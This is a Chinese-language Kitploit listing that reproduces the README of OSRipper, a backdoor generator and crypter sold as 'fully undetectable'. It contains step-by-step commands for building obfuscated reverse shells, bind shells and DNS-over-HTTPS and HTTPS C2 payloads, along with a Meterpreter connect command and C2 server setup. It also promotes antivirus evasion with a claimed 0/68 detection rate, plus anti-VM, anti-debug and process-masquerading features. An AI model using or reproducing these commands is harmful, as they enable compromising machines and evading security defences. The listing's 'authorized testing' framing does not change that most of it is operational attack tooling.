Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
OSRipper — 跨平台反病毒规避后门与加密器框架,集成轻量级webUI | Kitploit
工具/GitHubGitHub/noahoksuz/osripper
漏洞利用框架Payload生成IDS/IPS规避后渗透利用渗透测试命令与控制学习与教育红队
GitHubnoahoksuz/osripper

OSRipper

跨平台反病毒规避后门与加密器框架,集成轻量级webUI

查看仓库
32850757个月前Kitploit 审核通过
网站

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

高级跨平台载荷生成器与密码器,具备FUD能力

功能特性 • 快速开始 • Web UI • 载荷类型 • 文档


概述

OSRipper 是一款复杂且完全无法检测 (FUD) 的后门生成器与密码器,专为授权的渗透测试和红队行动而设计。它采用先进的规避技术、多种载荷类型,并提供基于 Web 的现代 C2 界面来管理受控系统。

核心亮点

  • 完全无法检测 (FUD) — 先进的规避技术可绕过现代杀毒软件
  • 基于 Web 的 C2 界面 — 用于管理活跃会话的现代化仪表盘
  • 多种载荷类型 — 绑定 shell、反向 shell、DoH C2、HTTPS C2 等
  • 多层混淆 — 标准与增强混淆,变量随机化
  • 二进制编译 — 将载荷编译为独立可执行文件
  • 加密通信 — SSL/TLS 和证书锁定 HTTPS C2 通道
  • 隐身特性 — VM 检测、反调试、进程伪装

功能特性

载荷生成

载荷类型描述使用场景
绑定 Shell在受害机器上打开端口当反向连接被阻止时直接访问
反向 TCP MeterpreterSSL/TLS 加密的反向连接标准渗透测试
DNS-over-HTTPS C2基于 DoH 的隐蔽命令与控制绕过网络限制
HTTPS C2证书锁定的 HTTPS C2安全、认证的 C2 通道
阶段式载荷多阶段 Web 投递增强隐身部署
自定义代码密码器混淆任意 Python 脚本自定义载荷加密

规避技术

  • 高级混淆 — 多层代码编码,随机变量
  • 增强混淆 — 反调试、VM 检测、垃圾代码注入
  • 反 VM 检测 — 沙箱和虚拟机规避
  • 隐身延迟 — 随机启动延迟(5-15 秒)
  • 进程伪装 — 伪装成合法系统进程
  • 签名随机化 — 每个载荷独一无二

Web UI 功能

  • 会话仪表盘 — 查看所有活跃 C2 会话
  • 交互式终端 — 通过 Web 界面执行命令
  • 载荷生成器 — 直接从 Web UI 生成载荷
  • 会话管理 — 查看系统信息、命令历史,管理会话
  • 实时更新 — 实时命令执行与响应查看

高级能力

  • Ngrok 集成 — 自动创建隧道,支持动态 IP
  • 证书锁定 — 带证书验证的安全 HTTPS C2
  • 会话持久化 — 跨重启维持连接
  • 命令队列 — 为离线代理排队命令
  • 响应解析 — 自动解析命令输出

快速开始

安装

# 克隆仓库
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# 安装依赖
pip3 install -r requirements.txt

# 安装软件包
pip3 install -e .

重要 — 运行 setup 以启用可选功能(ngrok、二进制编译):
在许多系统上(尤其是在外部管理 Python 环境的 Linux 上),你必须运行内置的 setup,以便将可选依赖安装到 OSRipper 自己的虚拟环境中。安装后请执行一次:

osripper-cli setup

这将创建 ~/.local/share/osripper/venv,并在其中安装 pyngrok、nuitka 和 sandboxed,此后所有 osripper / osripper-cli 的运行都会自动使用它们。如果不运行此命令,--ngrok 和 --compile 选项会提示你运行 setup。仅当你希望使用系统/用户级 pip 安装而非虚拟环境时,使用 osripper-cli setup --system。

基本用法

交互模式:

osripper
# 或
python3 -m osripper

命令行:

# 生成反向 shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# 生成 DoH C2 载荷
osripper-cli doh -d example.com --obfuscate --compile

Web UI:

# 启动带有 Web UI 的 C2 服务器
python -m osripper.c2.server example.com --port 5000

# 访问仪表盘 http://localhost:5000

Web UI

OSRipper 包含一个基于 Web 的现代化 C2 界面,用于管理受控系统。

功能特性

  • 仪表盘 — 所有活跃会话的概览
  • 会话管理 — 查看系统信息并执行命令
  • 载荷生成器 — 通过 Web 界面生成 DoH 和 HTTPS 载荷
  • 命令历史 — 跟踪所有已执行命令及其响应
  • 实时更新 — 实时命令执行与响应查看

启动 C2 服务器

# 基本用法
python -m osripper.c2.server example.com

# 使用 HTTPS
python -m osripper.c2.server example.com --https

# 自定义端口
python -m osripper.c2.server example.com --port 8080

# 使用自定义证书
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

访问 Web UI

服务器启动后,通过以下地址访问仪表盘:

  • HTTP:http://localhost:5000
  • HTTPS:https://localhost:5000(如果启用)

载荷类型

1. 绑定 Shell 后门

在受害机器上打开一个端口并等待连接。

osripper-cli bind -p 4444 --obfuscate --compile

连接:

msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. 反向 TCP Meterpreter

通过 SSL/TLS 加密的反向连接。

osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

使用 DNS-over-HTTPS 协议的隐蔽 C2 通道。可绕过许多网络限制。

# 生成载荷
osripper-cli doh -d example.com --obfuscate --compile

# 启动 C2 服务器
python -m osripper.c2.server example.com

特性:

  • 基于 DNS 的隐蔽通信
  • 用于会话管理的 Web UI
  • 自动会话持久化
  • 离线代理命令队列

4. HTTPS C2(证书锁定)

带有证书锁定认证的安全 HTTPS C2。

# 生成载荷(通过 Web UI 或命令行)
# 启动带有 HTTPS 的 C2 服务器
python -m osripper.c2.server example.com --https

# 获取证书指纹
curl http://localhost:5000/api/cert-fingerprint

特性:

  • 证书锁定保证安全
  • 加密的 HTTPS 通信
  • Web UI 集成
  • 会话管理

5. 阶段式载荷

多阶段 Web 投递,增强隐身性。

osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. 自定义代码密码器

混淆并加密任意 Python 脚本。

osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

命令行界面

常用选项

选项描述
--obfuscate启用多层混淆
--enhanced增强混淆(反调试、VM 检测)
--compile编译为独立二进制文件
--icon PATH编译后二进制文件的自定义图标
--delay添加随机启动延迟(5-15 秒)
--output, -o NAME输出文件名
--quiet, -q安静模式(最小化输出)

示例

# 全功能反向 shell
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# 带所有功能的 DoH C2
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# 自定义脚本加密
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# 使用 ngrok 实现动态 IP
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

检测结果

最新 VirusTotal 扫描

  • Python 载荷:0/68 检测率
  • 编译二进制:0/68 检测率

antiscan 结果

Antiscan Results


架构

┌─────────────────┐
│   生成的        │
│   二进制文件     │
└─────────────────┘
         │
         │ 执行
         ▼
┌──────────────────┐
│ 混淆后的         │
│ 投递器 / Dropper │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   C2 服务器      │
│   (Web UI)      │
│                 │
└─────────────────┘
         │
         │ 命令/响应
         ▼
┌─────────────────┐
│   代理           │
│   执行           │
└─────────────────┘

截图

主界面

Web UI 仪表盘

Web UI Dashboard


高级配置

Ngrok 集成

# 生成带 ngrok 的载荷
osripper-cli reverse --ngrok -p 4444

# 按照提示设置隧道
# 运行:ngrok tcp 4444

自定义图标

osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

混淆级别

标准混淆:

  • 多层编码
  • 变量随机化
  • 代码结构混淆

增强混淆:

  • 所有标准功能
  • 反调试技术
  • VM 检测
  • 垃圾代码注入
  • 高级规避
# 标准
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# 增强
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

HTTPS C2 设置

# 1. 启动带有 HTTPS 的 C2 服务器
python -m osripper.c2.server example.com --https

# 2. 获取证书指纹
curl http://localhost:5000/api/cert-fingerprint

# 3. 使用指纹生成载荷(通过 Web UI)
# 或者在负载生成中使用该指纹

文档

  • Wiki — 综合文档
  • 使用指南 — 详细使用说明
  • API 参考 — 开发者文档

路线图

已完成 (v0.3.2)

  • FUD 载荷生成(0/68 检测)
  • 基于 Web 的 C2 界面
  • DNS-over-HTTPS C2 载荷
  • 带证书锁定的 HTTPS C2
  • 多层混淆引擎
  • 会话管理系统
  • 命令排队与执行
  • 反 VM 检测
  • 进程伪装

进行中

  • 增强的后渗透模块
  • 高级持久化机制
  • 通过 Web UI 上传/下载文件
  • C2 服务器多用户支持

未来计划

  • AI 驱动的规避技术
  • 基于区块链的 C2 基础设施
  • 移动平台支持
  • 高级社会工程载荷

贡献

我们欢迎安全研究社区的贡献!

如何贡献

  1. Fork 仓库
  2. 创建功能分支 (git checkout -b feature/amazing-feature)
  3. 提交更改 (git commit -m '添加很棒的功能')
  4. 推送到分支 (git push origin feature/amazing-feature)
  5. 发起 Pull Request

开发指南

下载工具